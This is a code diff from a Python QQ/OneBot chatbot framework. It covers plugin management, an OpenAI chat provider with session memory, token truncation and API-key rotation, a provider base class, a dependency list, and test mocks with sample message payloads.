if p.metadata.plugin_name == plugin_name:
|
||||
return p
|
||||
|
||||
def uninstall_plugin(self, plugin_name: str):
|
||||
plugin = self.get_registered_plugin(plugin_name)
|
||||
if not plugin:
|
||||
raise Exception("插件不存在。")
|
||||
root_dir_name = plugin.root_dir_name
|
||||
ppath = self.plugin_store_path
|
||||
self.context.cached_plugins.remove(plugin)
|
||||
if not remove_dir(os.path.join(ppath, root_dir_name)):
|
||||
raise Exception("移除插件成功,但是删除插件文件夹失败。您可以手动删除该文件夹,位于 addons/plugins/ 下。")
|
||||
|
||||
async def update_plugin(self, plugin_name: str):
|
||||
plugin = self.get_registered_plugin(plugin_name)
|
||||
if not plugin:
|
||||
raise Exception("插件不存在。")
|
||||
|
||||
await self.updator.update(plugin)
|
||||
|
||||
def plugin_reload(self):
|
||||
cached_plugins = self.context.cached_plugins
|
||||
plugins = self.get_plugin_modules()
|
||||
if plugins is None:
|
||||
return False, "未找到任何插件模块"
|
||||
fail_rec = ""
|
||||
|
||||
registered_map = {}
|
||||
for p in cached_plugins:
|
||||
registered_map[p.module_path] = None
|
||||
|
||||
for plugin in plugins:
|
||||
try:
|
||||
p = plugin['module']
|
||||
module_path = plugin['module_path']
|
||||
root_dir_name = plugin['pname']
|
||||
|
||||
logger.info(f"正在加载插件 {root_dir_name} ...")
|
||||
|
||||
self.check_plugin_dept_update(target_plugin=root_dir_name)
|
||||
|
||||
module = __import__("data.plugins." +
|
||||
root_dir_name + "." + p, fromlist=[p])
|
||||
|
||||
cls = self.get_classes(module)
|
||||
|
||||
try:
|
||||
# 尝试传入 ctx
|
||||
obj = getattr(module, cls[0])(context=self.context)
|
||||
except TypeError:
|
||||
obj = getattr(module, cls[0])()
|
||||
except BaseException as e:
|
||||
raise e
|
||||
|
||||
metadata = None
|
||||
|
||||
plugin_path = os.path.join(self.plugin_store_path, root_dir_name)
|
||||
metadata = self.load_plugin_metadata(plugin_path=plugin_path, plugin_obj=obj)
|
||||
|
||||
logger.info(f"插件 {metadata.plugin_name}({metadata.author}) 加载成功。")
|
||||
|
||||
if module_path not in registered_map:
|
||||
cached_plugins.append(RegisteredPlugin(
|
||||
metadata=metadata,
|
||||
plugin_instance=obj,
|
||||
module=module,
|
||||
module_path=module_path,
|
||||
root_dir_name=root_dir_name
|
||||
))
|
||||
except BaseException as e:
|
||||
traceback.print_exc()
|
||||
fail_rec += f"加载插件 {plugin['pname']} 出现问题,原因 {str(e)}\n"
|
||||
|
||||
if not fail_rec:
|
||||
return True, None
|
||||
else:
|
||||
return False, fail_rec
|
||||
|
||||
def install_plugin_from_file(self, zip_file_path: str):
|
||||
# try to unzip
|
||||
temp_dir = os.path.join(os.path.dirname(zip_file_path), str(uuid.uuid4()))
|
||||
self.updator.unzip_file(zip_file_path, temp_dir)
|
||||
# check if the plugin has metadata.yaml
|
||||
if not os.path.exists(os.path.join(temp_dir, "metadata.yaml")):
|
||||
remove_dir(temp_dir)
|
||||
raise Exception("插件缺少 metadata.yaml 文件。")
|
||||
|
||||
metadata = self.load_plugin_metadata(temp_dir)
|
||||
plugin_name = metadata.plugin_name
|
||||
if not plugin_name:
|
||||
remove_dir(temp_dir)
|
||||
raise Exception("插件 metadata.yaml 文件中 name 字段为空。")
|
||||
plugin_name = self.updator.format_name(plugin_name)
|
||||
|
||||
ppath = self.plugin_store_path
|
||||
plugin_path = os.path.join(ppath, plugin_name)
|
||||
if os.path.exists(plugin_path):
|
||||
remove_dir(plugin_path)
|
||||
|
||||
# move to the target path
|
||||
shutil.move(temp_dir, plugin_path)
|
||||
|
||||
if metadata.repo:
|
||||
with open(os.path.join(plugin_path, "REPO"), "w", encoding='utf-8') as f:
|
||||
f.write(metadata.repo)
|
||||
|
||||
# remove the temp dir
|
||||
remove_dir(temp_dir)
|
||||
|
||||
self.check_plugin_dept_update()
|
||||
|
||||
# ok, err = self.plugin_reload()
|
||||
# if not ok:
|
||||
# raise Exception(err)
|
||||
|
||||
def load_plugin_metadata(self, plugin_path: str, plugin_obj = None) -> PluginMetadata:
|
||||
metadata = None
|
||||
|
||||
if not os.path.exists(plugin_path):
|
||||
raise Exception("插件不存在。")
|
||||
|
||||
if os.path.exists(os.path.join(plugin_path, "metadata.yaml")):
|
||||
with open(os.path.join(plugin_path, "metadata.yaml"), "r", encoding='utf-8') as f:
|
||||
metadata = yaml.safe_load(f)
|
||||
elif plugin_obj:
|
||||
# 使用 info() 函数
|
||||
metadata = plugin_obj.info()
|
||||
|
||||
if isinstance(metadata, dict):
|
||||
if 'name' not in metadata or 'desc' not in metadata or 'version' not in metadata or 'author' not in metadata:
|
||||
raise Exception("插件元数据信息不完整。")
|
||||
metadata = PluginMetadata(
|
||||
plugin_name=metadata['name'],
|
||||
plugin_type=PluginType.COMMON if 'plugin_type' not in metadata else PluginType(metadata['plugin_type']),
|
||||
author=metadata['author'],
|
||||
desc=metadata['desc'],
|
||||
version=metadata['version'],
|
||||
repo=metadata['repo'] if 'repo' in metadata else None
|
||||
)
|
||||
|
||||
return metadata
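load_plugin_metadata above falls back to the plugin object's info() method when metadata.yaml is absent, and requires the name/desc/version/author keys; a hypothetical minimal implementation a plugin could ship:

class Main:
    def info(self):
        # Required keys per load_plugin_metadata; 'plugin_type' and 'repo' are optional.
        return {
            "name": "demo_plugin",
            "desc": "一个演示插件",
            "version": "0.1.0",
            "author": "someone",
        }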
|
||||
509
model/provider/openai_official.py
Normal file
@@ -0,0 +1,509 @@
|
||||
import os
|
||||
import asyncio
|
||||
import json
|
||||
import time
|
||||
import tiktoken
|
||||
import threading
|
||||
import traceback
|
||||
import base64
|
||||
|
||||
from openai import AsyncOpenAI
|
||||
from openai.types.chat.chat_completion import ChatCompletion
|
||||
from openai._exceptions import *
|
||||
from util.io import download_image_by_url
|
||||
|
||||
from astrbot.persist.helper import dbConn
|
||||
from model.provider.provider import Provider
|
||||
from util.cmd_config import LLMConfig
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from typing import List, Dict
|
||||
|
||||
from dataclasses import asdict
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
MODELS = {
|
||||
"gpt-4o": 128000,
|
||||
"gpt-4o-2024-05-13": 128000,
|
||||
"gpt-4-turbo": 128000,
|
||||
"gpt-4-turbo-2024-04-09": 128000,
|
||||
"gpt-4-turbo-preview": 128000,
|
||||
"gpt-4-0125-preview": 128000,
|
||||
"gpt-4-1106-preview": 128000,
|
||||
"gpt-4-vision-preview": 128000,
|
||||
"gpt-4-1106-vision-preview": 128000,
|
||||
"gpt-4": 8192,
|
||||
"gpt-4-0613": 8192,
|
||||
"gpt-4-32k": 32768,
|
||||
"gpt-4-32k-0613": 32768,
|
||||
"gpt-3.5-turbo-0125": 16385,
|
||||
"gpt-3.5-turbo": 16385,
|
||||
"gpt-3.5-turbo-1106": 16385,
|
||||
"gpt-3.5-turbo-instruct": 4096,
|
||||
"gpt-3.5-turbo-16k": 16385,
|
||||
"gpt-3.5-turbo-0613": 16385,
|
||||
"gpt-3.5-turbo-16k-0613": 16385,
|
||||
}
|
||||
|
||||
class ProviderOpenAIOfficial(Provider):
|
||||
def __init__(self, llm_config: LLMConfig) -> None:
|
||||
super().__init__()
|
||||
|
||||
self.api_keys = []
|
||||
self.chosen_api_key = None
|
||||
self.base_url = None
|
||||
self.llm_config = llm_config
|
||||
self.keys_data = {} # 记录超额
|
||||
if llm_config.key: self.api_keys = llm_config.key
|
||||
if llm_config.api_base: self.base_url = llm_config.api_base
|
||||
if not self.api_keys:
|
||||
logger.warn("看起来你没有添加 OpenAI 的 API 密钥,OpenAI LLM 能力将不会启用。")
|
||||
else:
|
||||
self.chosen_api_key = self.api_keys[0]
|
||||
|
||||
for key in self.api_keys:
|
||||
self.keys_data[key] = True
|
||||
|
||||
self.client = AsyncOpenAI(
|
||||
api_key=self.chosen_api_key,
|
||||
base_url=self.base_url
|
||||
)
|
||||
super().set_curr_model(llm_config.model_config.model)
|
||||
if llm_config.image_generation_model_config:
|
||||
self.image_generator_model_configs: Dict = asdict(llm_config.image_generation_model_config)
|
||||
self.session_memory: Dict[str, List] = {} # 会话记忆
|
||||
self.session_memory_lock = threading.Lock()
|
||||
self.max_tokens = self.llm_config.model_config.max_tokens # 上下文窗口大小
|
||||
|
||||
logger.info("正在载入分词器 cl100k_base...")
|
||||
self.tokenizer = tiktoken.get_encoding("cl100k_base") # todo: 根据 model 切换分词器
|
||||
logger.info("分词器载入完成。")
|
||||
|
||||
self.DEFAULT_PERSONALITY = {
|
||||
"prompt": self.llm_config.default_personality,
|
||||
"name": "default"
|
||||
}
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
self.session_personality = {} # 记录了某个session是否已设置人格。
|
||||
# 从 SQLite DB 读取历史记录
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
self.session_memory_lock.acquire()
|
||||
self.session_memory[session[0]] = json.loads(session[1])['data']
|
||||
self.session_memory_lock.release()
|
||||
except BaseException as e:
|
||||
logger.warn(f"读取 OpenAI LLM 对话历史记录 失败:{e}。仍可正常使用。")
|
||||
|
||||
# 定时保存历史记录
|
||||
threading.Thread(target=self.dump_history, daemon=True).start()
|
||||
|
||||
def dump_history(self):
|
||||
'''
|
||||
转储历史记录
|
||||
'''
|
||||
time.sleep(10)
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
for key in self.session_memory:
|
||||
data = self.session_memory[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
logger.debug("已保存 OpenAI 会话历史记录")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
finally:
|
||||
time.sleep(10*60)
|
||||
|
||||
def personality_set(self, default_personality: dict, session_id: str):
|
||||
if not default_personality: return
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
self.curr_personality = default_personality
|
||||
self.session_personality = {} # 重置
|
||||
encoded_prompt = self.tokenizer.encode(default_personality['prompt'])
|
||||
tokens_num = len(encoded_prompt)
|
||||
model = self.get_curr_model()
|
||||
if model in MODELS and tokens_num > MODELS[model] - 500:
|
||||
default_personality['prompt'] = self.tokenizer.decode(encoded_prompt[:MODELS[model] - 500])
|
||||
|
||||
new_record = {
|
||||
"user": {
|
||||
"role": "system",
|
||||
"content": default_personality['prompt'],
|
||||
},
|
||||
'usage_tokens': 0, # 到该条目的总 token 数
|
||||
'single-tokens': 0 # 该条目的 token 数
|
||||
}
|
||||
|
||||
self.session_memory[session_id].append(new_record)
|
||||
|
||||
async def encode_image_bs64(self, image_url: str) -> str:
|
||||
'''
|
||||
将图片转换为 base64
|
||||
'''
|
||||
if image_url.startswith("http"):
|
||||
image_url = await download_image_by_url(image_url)
|
||||
|
||||
with open(image_url, "rb") as f:
|
||||
image_bs64 = base64.b64encode(f.read()).decode()
|
||||
return "data:image/jpeg;base64," + image_bs64
|
||||
|
||||
async def retrieve_context(self, session_id: str):
|
||||
'''
|
||||
根据 session_id 获取保存的 OpenAI 格式的上下文
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
# 转换为 openai 要求的格式
|
||||
context = []
|
||||
is_lvm = await self.is_lvm()
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
if not is_lvm and "content" in record['user'] and isinstance(record['user']['content'], list):
|
||||
logger.warn(f"由于当前模型 {self.get_curr_model()} 不支持视觉,将忽略上下文中的图片输入。如果一直弹出此警告,可以尝试 reset 指令。")
|
||||
continue
|
||||
context.append(record['user'])
|
||||
if "AI" in record and record['AI']:
|
||||
context.append(record['AI'])
|
||||
|
||||
return context
|
||||
|
||||
async def is_lvm(self):
|
||||
'''
|
||||
是否是 LVM
|
||||
'''
|
||||
return self.get_curr_model().startswith("gpt-4")
|
||||
|
||||
async def get_models(self):
|
||||
try:
|
||||
models = await self.client.models.list()
|
||||
except NotFoundError as e:
|
||||
bu = str(self.client.base_url)
|
||||
self.client.base_url = bu + "/v1"
|
||||
models = await self.client.models.list()
|
||||
return filter(lambda x: x.id.startswith("gpt"), models.data)  # 不放在 finally 中,避免吞掉重试时的异常
|
||||
|
||||
async def assemble_context(self, session_id: str, prompt: str, image_url: str = None):
|
||||
'''
|
||||
组装上下文,并且根据当前上下文窗口大小截断
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
tokens_num = len(self.tokenizer.encode(prompt))
|
||||
previous_total_tokens_num = 0 if not self.session_memory[session_id] else self.session_memory[session_id][-1]['usage_tokens']
|
||||
|
||||
message = {
|
||||
"usage_tokens": previous_total_tokens_num + tokens_num,
|
||||
"single_tokens": tokens_num,
|
||||
"AI": None
|
||||
}
|
||||
if image_url:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": prompt
|
||||
},
|
||||
{
|
||||
"type": "image_url",
|
||||
"image_url": {
|
||||
"url": await self.encode_image_bs64(image_url)
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
else:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": prompt
|
||||
}
|
||||
|
||||
message["user"] = user_content
|
||||
self.session_memory[session_id].append(message)
|
||||
|
||||
# 根据 模型的上下文窗口 淘汰掉多余的记录
|
||||
curr_model = self.get_curr_model()
|
||||
if curr_model in MODELS:
|
||||
maxium_tokens_num = MODELS[curr_model] - 300 # 至少预留 300 给 completion
|
||||
# if message['usage_tokens'] > maxium_tokens_num:
|
||||
# 淘汰多余的记录,使得最终的 usage_tokens 不超过 maxium_tokens_num - 300
|
||||
# contexts = self.session_memory[session_id]
|
||||
# need_to_remove_idx = 0
|
||||
# freed_tokens_num = contexts[0]['single-tokens']
|
||||
# while freed_tokens_num < message['usage_tokens'] - maxium_tokens_num:
|
||||
# need_to_remove_idx += 1
|
||||
# freed_tokens_num += contexts[need_to_remove_idx]['single-tokens']
|
||||
# # 更新之后的所有记录的 usage_tokens
|
||||
# for i in range(len(contexts)):
|
||||
# if i > need_to_remove_idx:
|
||||
# contexts[i]['usage_tokens'] -= freed_tokens_num
|
||||
# logger.debug(f"淘汰上下文记录 {need_to_remove_idx+1} 条,释放 {freed_tokens_num} 个 token。当前上下文总 token 为 {contexts[-1]['usage_tokens']}。")
|
||||
# self.session_memory[session_id] = contexts[need_to_remove_idx+1:]
|
||||
while len(self.session_memory[session_id]) and self.session_memory[session_id][-1]['usage_tokens'] > maxium_tokens_num:
|
||||
self.pop_record(session_id)
|
||||
|
||||
|
||||
    async def pop_record(self, session_id: str, pop_system_prompt: bool = False):
        '''
        Pop the earliest record of the session.
        '''
        if session_id not in self.session_memory:
            raise Exception("Session ID does not exist.")

        if len(self.session_memory[session_id]) == 0:
            return None

        record = None
        for i in range(len(self.session_memory[session_id])):
            # Skip system prompts unless pop_system_prompt is set.
            if not pop_system_prompt and self.session_memory[session_id][i]['user']['role'] == "system":
                # Keep it only if it is the sole system prompt.
                f = False
                for j in range(i+1, len(self.session_memory[session_id])):
                    if self.session_memory[session_id][j]['user']['role'] == "system":
                        f = True
                        break
                if not f:
                    continue
            record = self.session_memory[session_id].pop(i)
            break

        if record is None:
            # Nothing could be popped (e.g. only a single system prompt is left).
            return None

        # Update usage_tokens of all remaining records.
        for i in range(len(self.session_memory[session_id])):
            self.session_memory[session_id][i]['usage_tokens'] -= record['single_tokens']
        logger.debug(f"Evicted 1 context record, freeing {record['single_tokens']} tokens. Current context total is {self.session_memory[session_id][-1]['usage_tokens']} tokens.")
        return record

    async def text_chat(self,
                        prompt: str,
                        session_id: str,
                        image_url: str = None,
                        tools: list = None,
                        extra_conf: Dict = None,
                        **kwargs
                        ) -> str:
        if os.environ.get("TEST_LLM", "off") != "on" and os.environ.get("TEST_MODE", "off") == "on":
            return "This is a test message."

        super().accu_model_stat()
        if not session_id:
            session_id = "unknown"
            if "unknown" in self.session_memory:
                del self.session_memory["unknown"]

        if session_id not in self.session_memory:
            self.session_memory[session_id] = []

        if session_id not in self.session_personality or not self.session_personality[session_id]:
            self.personality_set(self.curr_personality, session_id)
            self.session_personality[session_id] = True

        # If the prompt exceeds the maximum window, truncate it. This
        # 1. guarantees that later pops will not run into problems, and
        # 2. guarantees that the maximum token count is not exceeded.
        _encoded_prompt = self.tokenizer.encode(prompt)
        curr_model = self.get_curr_model()
        if curr_model in MODELS and len(_encoded_prompt) > MODELS[curr_model] - 300:
            _encoded_prompt = _encoded_prompt[:MODELS[curr_model] - 300]
            prompt = self.tokenizer.decode(_encoded_prompt)

        # Assemble the context and truncate it to the current context window.
        await self.assemble_context(session_id, prompt, image_url)

        # Retrieve the context in OpenAI format.
        contexts = await self.retrieve_context(session_id)

        conf = asdict(self.llm_config.model_config)
        if extra_conf: conf.update(extra_conf)

        # start request
        retry = 0
        rate_limit_retry = 0
        while retry < 3 or rate_limit_retry < 5:  # keep retrying while either retry budget is left
            logger.debug(conf)
            logger.debug(contexts)
            if tools:
                completion_coro = self.client.chat.completions.create(
                    messages=contexts,
                    tools=tools,
                    **conf
                )
            else:
                completion_coro = self.client.chat.completions.create(
                    messages=contexts,
                    **conf
                )
            try:
                completion = await completion_coro
                break
            except AuthenticationError as e:
                api_key = self.chosen_api_key[:10] + "..."
                logger.error(f"OpenAI API key {api_key} failed authentication. Reason: {e}. Switching to the next available key (if any).")
                self.keys_data[self.chosen_api_key] = False
                ok = await self.switch_to_next_key()
                if ok: continue
                else: raise Exception("No OpenAI API key is currently usable.")
            except BadRequestError as e:
                retry += 1
                logger.warn(f"OpenAI request error: {e}.")
                if "image_url is only supported by certain models." in str(e):
                    raise Exception(f"The current model { self.get_curr_model() } does not support image input; please switch to another model.")
            except RateLimitError as e:
                if "You exceeded your current quota" in str(e):
                    self.keys_data[self.chosen_api_key] = False
                    ok = await self.switch_to_next_key()
                    if ok: continue
                    else: raise Exception("No OpenAI API key is currently usable.")
                logger.error(f"OpenAI API key {self.chosen_api_key} hit the rate limit or the upstream server is currently overloaded. Reason: {e}")
                await self.switch_to_next_key()
                rate_limit_retry += 1
                await asyncio.sleep(1)
            except NotFoundError as e:
                raise e
            except Exception as e:
                retry += 1
                if retry >= 3:
                    logger.error(traceback.format_exc())
                    raise Exception(f"OpenAI request failed: {e}. Maximum number of retries reached.")
                if "maximum context length" in str(e):
                    logger.warn(f"OpenAI request failed: {e}. The context length exceeded the limit; popping the earliest record and retrying.")
                    await self.pop_record(session_id)

                logger.warning(traceback.format_exc())
                logger.warning(f"OpenAI request failed: {e}. Retry {retry}.")
                await asyncio.sleep(1)

        assert isinstance(completion, ChatCompletion)
        logger.debug(f"openai completion: {completion.usage}")

        if len(completion.choices) == 0:
            raise Exception("The OpenAI API returned an empty completion.")
        choice = completion.choices[0]

        usage_tokens = completion.usage.total_tokens
        completion_tokens = completion.usage.completion_tokens
        self.session_memory[session_id][-1]['usage_tokens'] = usage_tokens
        self.session_memory[session_id][-1]['single_tokens'] += completion_tokens

        if choice.message.content:
            # Plain text reply.
            completion_text = str(choice.message.content).strip()
        elif choice.message.tool_calls:
            # Tool call (function calling).
            return choice.message.tool_calls[0].function

        self.session_memory[session_id][-1]['AI'] = {
            "role": "assistant",
            "content": completion_text
        }

        return completion_text

    async def switch_to_next_key(self):
        '''
        Switch to the next available API key.
        '''
        if not self.api_keys:
            logger.error("No OpenAI API key is configured.")
            return False

        for key in self.keys_data:
            if self.keys_data[key]:
                # This key has not exceeded its quota.
                self.chosen_api_key = key
                self.client.api_key = key
                logger.info(f"OpenAI switched to API key {key[:10]}... successfully.")
                return True

        return False

    async def image_generate(self, prompt: str, session_id: str = None, **kwargs) -> str:
        '''
        Generate an image.
        '''
        retry = 0
        conf = self.image_generator_model_configs
        if not conf:
            logger.error("No OpenAI image generation model is configured.")
            raise Exception("No OpenAI image generation model is configured.")
        super().accu_model_stat(model=conf['model'])
        while retry < 3:
            try:
                images_response = await self.client.images.generate(
                    prompt=prompt,
                    **conf
                )
                image_url = images_response.data[0].url
                return image_url
            except Exception as e:
                retry += 1
                if retry >= 3:
                    logger.error(traceback.format_exc())
                    raise Exception(f"OpenAI image generation request failed: {e}. Maximum number of retries reached.")
                logger.warning(f"OpenAI image generation request failed: {e}. Retry {retry}.")
                await asyncio.sleep(1)

    async def forget(self, session_id=None, keep_system_prompt: bool = False) -> bool:
        if session_id is None: return False
        self.session_memory[session_id] = []
        if keep_system_prompt:
            self.personality_set(self.curr_personality, session_id)
        else:
            self.curr_personality = self.DEFAULT_PERSONALITY
        return True

    def dump_contexts_page(self, session_id: str, size=5, page=1):
        '''
        Dump the cached conversation for a session.
        '''
        # contexts_str = ""
        # for i, key in enumerate(self.session_memory):
        #     if i < (page-1)*size or i >= page*size:
        #         continue
        #     contexts_str += f"Session ID: {key}\n"
        #     for record in self.session_memory[key]:
        #         if "user" in record:
        #             contexts_str += f"User: {record['user']['content']}\n"
        #         if "AI" in record:
        #             contexts_str += f"AI: {record['AI']['content']}\n"
        #     contexts_str += "---\n"
        contexts_str = ""
        if session_id in self.session_memory:
            for record in self.session_memory[session_id]:
                if "user" in record and record['user']:
                    text = record['user']['content'][:100] + "..." if len(record['user']['content']) > 100 else record['user']['content']
                    contexts_str += f"User: {text}\n"
                if "AI" in record and record['AI']:
                    text = record['AI']['content'][:100] + "..." if len(record['AI']['content']) > 100 else record['AI']['content']
                    contexts_str += f"Assistant: {text}\n"
        else:
            contexts_str = "Session ID does not exist."

        return contexts_str, len(self.session_memory.get(session_id, []))

    def set_model(self, model: str):
        # TODO: also update the config file
        super().set_curr_model(model)

    def get_configs(self):
        return asdict(self.llm_config)

    def get_keys_data(self):
        return self.keys_data

    def get_curr_key(self):
        return self.chosen_api_key

    def set_key(self, key):
        self.client.api_key = key
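For orientation, a minimal usage sketch of the provider above. It assumes an async context and an llm_config object built the way tests/test_message.py below builds it; none of this is part of the diff itself.

# Sketch only: llm_config is assumed to come from the bot configuration.
provider = ProviderOpenAIOfficial(llm_config)
reply = await provider.text_chat("Hello!", session_id="demo")                  # plain text chat
reply = await provider.text_chat("What is in this picture?",
                                 session_id="demo",
                                 image_url="https://example.com/cat.jpg")      # vision input, if the model supports it
await provider.forget(session_id="demo", keep_system_prompt=True)             # reset the session, keep the persona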
58
model/provider/provider.py
Normal file
@@ -0,0 +1,58 @@
from collections import defaultdict


class Provider:
    def __init__(self) -> None:
        self.model_stat = defaultdict(int)  # records per-model LLM usage counts
        self.curr_model_name = "unknown"

    def reset_model_stat(self):
        self.model_stat.clear()

    def set_curr_model(self, model_name: str):
        self.curr_model_name = model_name

    def get_curr_model(self):
        '''
        Return the LLM model currently in use.
        '''
        return self.curr_model_name

    def accu_model_stat(self, model: str = None):
        if not model:
            model = self.get_curr_model()
        self.model_stat[model] += 1

    async def text_chat(self,
                        prompt: str,
                        session_id: str,
                        image_url: str = None,
                        tools: list = None,
                        extra_conf: dict = None,
                        default_personality: dict = None,
                        **kwargs) -> str:
        '''
        [require]
        prompt: the prompt text
        session_id: the session id

        [optional]
        image_url: image URL (vision input)
        tools: function-calling tools
        extra_conf: extra configuration
        default_personality: default persona
        '''
        raise NotImplementedError()

    async def image_generate(self, prompt, session_id, **kwargs) -> str:
        '''
        [require]
        prompt: the prompt text
        session_id: the session id
        '''
        raise NotImplementedError()

    async def forget(self, session_id=None) -> bool:
        '''
        Reset the session.
        '''
        raise NotImplementedError()
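To illustrate the contract defined by this base class, a hypothetical minimal subclass (EchoProvider is an invented name, not part of the codebase):

class EchoProvider(Provider):
    def __init__(self) -> None:
        super().__init__()
        self.set_curr_model("echo")

    async def text_chat(self, prompt: str, session_id: str, **kwargs) -> str:
        self.accu_model_stat()  # count one call against the current model
        return prompt           # trivially echo the prompt back

    async def forget(self, session_id=None) -> bool:
        return True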
@@ -1,3 +1,17 @@
requests~=2.28.2
openai~=0.26.5
qq-botpy~=1.1.2
pydantic~=1.10.4
aiohttp
openai
qq-botpy
chardet~=5.1.0
Pillow
nakuru-project
beautifulsoup4
googlesearch-python
tiktoken
readability-lxml
websockets
flask
psutil
lxml_html_clean
SparkleLogging
aiocqhttp
(5 image files removed; before sizes: 143 KiB, 110 KiB, 241 KiB, 239 KiB, 59 KiB)
18
tests/mocks/onebot.py
Normal file
@@ -0,0 +1,18 @@
import copy
from aiocqhttp import Event


class MockOneBotMessage():
    def __init__(self):
        # None of this data is sensitive.
self.group_event_sample = Event.from_payload({'self_id': 3430871669, 'user_id': 905617992, 'time': 1723882500, 'message_id': -2147480159, 'message_seq': -2147480159, 'real_id': -2147480159, 'message_type': 'group', 'sender': {'user_id': 905617992, 'nickname': 'Soulter', 'card': '', 'role': 'owner'}, 'raw_message': '[CQ:at,qq=3430871669] just reply me `ok`', 'font': 14, 'sub_type': 'normal', 'message': [{'data': {'qq': '3430871669'}, 'type': 'at'}, {'data': {'text': ' just reply me `ok`'}, 'type': 'text'}], 'message_format': 'array', 'post_type': 'message', 'group_id': 849750470})
self.friend_event_sample = Event.from_payload({'self_id': 3430871669, 'user_id': 905617992, 'time': 1723882599, 'message_id': -2147480157, 'message_seq': -2147480157, 'real_id': -2147480157, 'message_type': 'private', 'sender': {'user_id': 905617992, 'nickname': 'Soulter', 'card': ''}, 'raw_message': 'just reply me `ok`', 'font': 14, 'sub_type': 'friend', 'message': [{'data': {'text': 'just reply me `ok`'}, 'type': 'text'}], 'message_format': 'array', 'post_type': 'message'})

    def create_random_group_message(self):
        return self.group_event_sample

    def create_random_direct_message(self):
        return self.friend_event_sample

    def create_msg(self, text: str):
        self.group_event_sample.message = [{'data': {'qq': '3430871669'}, 'type': 'at'}, {'data': {'text': text}, 'type': 'text'}]
        return self.group_event_sample
54
tests/mocks/qq_official.py
Normal file
@@ -0,0 +1,54 @@
import botpy.message


class MockQQOfficialMessage():
    def __init__(self):
        # This data has already been desensitized.
self.group_plain_text_sample = {'author': {'id': '3E47ABD92415AFEF02DAD74FFAB592D1', 'member_openid': '3E47ABD92415AFEF02DAD74FFAB592D1'}, 'content': 'just reply me `ok`', 'group_id': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'group_openid': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'id': 'ROBOT1.0_test', 'timestamp': '2024-07-27T19:58:52+08:00'}
self.group_plain_image_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'size': 1440173, 'url': 'https://multimedia.nt.qq.com.cn/download?appid=1407&fileid=Cgk5MDU2MTc5OTISFBvbdDR6nYEHsqWEfYauN9wphLxlGK3zVyD_Cii9ibiql8eHA1CAvaMB&rkey=CAESKE4_cASDm1t162vI7q9gitU2u0SUciVRg1fbyn3zYe9f_XHL2vhiB0s&spec=0', 'width': 1186}], 'author': {'id': '3E47ABD92415AFEF02DAD74FFAB592D1', 'member_openid': '3E47ABD92415AFEF02DAD74FFAB592D1'}, 'content': ' ', 'group_id': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'group_openid': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'id': 'ROBOT1.0_test', 'timestamp': '2024-07-27T20:06:32+08:00'}
self.group_multimedia_sample = {'attachments': [{'content_type': 'image/png', 'filename': '165FCBF8BD6F42496B58A6C66C5D4255.png', 'height': 1034, 'size': 1440173, 'url': 'https://multimedia.nt.qq.com.cn/download?appid=1407&fileid=Cgk5MDU2MTc5OTISFBvbdDR6nYEHsqWEfYauN9wphLxlGK3zVyD_CiiMytyomceHA1CAvaMB&rkey=CAQSKDOc_jvbthUjVk7zSzPCqflD2XWA0OWzO5qCNsiRFY4RfQMuHYt8KDU&spec=0', 'width': 1186}], 'author': {'id': '3E47ABD92415AFEF02DAD74FFAB592D1', 'member_openid': '3E47ABD92415AFEF02DAD74FFAB592D1'}, 'content': " What's this", 'group_id': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'group_openid': 'BF5D5CA67932FFC4AFD18D4309DB759D', 'id': 'ROBOT1.0_test', 'timestamp': '2024-07-27T20:15:24+08:00'}
self.group_event_id_sample = "GROUP_AT_MESSAGE_CREATE:ss6hqvpgtqv99eglilbjpsdzvudsjev64th8srgofxqkgxwpynhysl6q6ws849"
self.guild_plain_text_sample = {'author': {'avatar': 'https://qqchannel-profile-1251316161.file.myqcloud.com/168087977775f0eae70da8e512?t=1680879777', 'bot': False, 'id': '6946931796791550499', 'username': 'Soulter'}, 'channel_id': '9941389', 'content': '<@!2519660939131724751> just reply me `ok`', 'guild_id': '7969749791337194879', 'id': '08ffca96ebdaa68fcd6e108de3de0438ef0e48a6c793b506', 'member': {'joined_at': '2022-08-13T13:13:56+08:00', 'nick': 'Soulter', 'roles': ['4', '23']}, 'mentions': [{'avatar': 'http://thirdqq.qlogo.cn/g?b=oidb&k=OUbv2LTECcjQt48ibDS4OcA&kti=ZqTjpgAAAAI&s=0&t=1708501824', 'bot': True, 'id': '2519660939131724751', 'username': '浅橙Bot'}], 'seq': 1903, 'seq_in_channel': '1903', 'timestamp': '2024-07-27T20:10:14+08:00'}
